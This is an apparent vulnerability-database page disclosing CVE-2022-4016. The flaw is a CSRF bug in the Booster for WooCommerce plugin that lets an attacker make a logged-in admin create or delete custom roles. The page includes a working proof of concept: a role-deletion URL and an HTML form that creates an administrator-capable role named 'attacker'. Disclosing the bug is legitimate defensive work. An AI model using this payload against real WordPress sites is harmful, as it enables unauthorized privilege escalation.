Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:9B77044C-FD3F-4E6F-A759-DCC3082DCBD6
HistoryNov 21, 2022 - 12:00 a.m.

Booster for WooCommerce - Custom Role Creation/Deletion via CSRF

2022-11-2100:00:00
wpvulndb
208
woocommerce
custom role
csrf

EPSS

0.001

Percentile

34.1%

JSON

The plugins does not properly check for CSRF when creating and deleting Customer roles, allowing attackers to make logged admins create and delete arbitrary custom roles via CSRF attacks

To delete the custom role dj (it's possible to delete roles created by other plugins), make a logged in admin open https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&wcj_delete_role=dj

To create a custom role, make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles" method="POST">
    <input type="text" name="wcj_custom_role_id" value="via-csrf">
    <input type="text" name="wcj_custom_role_name" value="attacker">
    <input type="text" name="wcj_custom_role_caps" value="administrator">
    <input type="submit" name="submit" value="submit">
</form>

Related

cvelist 1
cve 1
wpvulndb 1
nvd 1
prion 1
cvelist
cvelist
CVE-2022-4016 Booster for WooCommerce - Custom Role Creation/Deletion via CSRF
2022-12-12 17:57:10
cve
cve
CVE-2022-4016
2022-12-12 18:15:13
wpvulndb
wpvulndb
Booster for WooCommerce - Custom Role Creation/Deletion via CSRF
2022-11-21 00:00:00
nvd
nvd
CVE-2022-4016
2022-12-12 18:15:13
prion
prion
Cross site request forgery (csrf)
2022-12-12 18:15:00

EPSS

0.001

Percentile

34.1%

JSON
Related for WPEX-ID:9B77044C-FD3F-4E6F-A759-DCC3082DCBD6
cvelist1cve1wpvulndb1nvd1prion1